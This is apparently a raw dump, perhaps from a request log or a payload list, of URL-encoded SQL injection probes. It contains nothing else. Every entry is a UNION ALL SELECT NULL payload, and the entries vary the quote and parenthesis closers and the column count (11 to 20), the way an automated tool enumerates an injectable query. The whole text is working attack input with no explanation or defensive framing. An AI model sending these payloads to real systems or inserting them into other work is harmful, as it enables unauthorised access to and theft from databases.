1%29%20WHERE%203759%3D3759%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%205623%3D5623%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%206392%3D6392%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%206871%3D6871%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%202877%3D2877%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%207657%3D7657%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%208354%3D8354%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%209607%3D9607%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%202021%3D2021%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%205271%3D5271%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%208040%3D8040%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 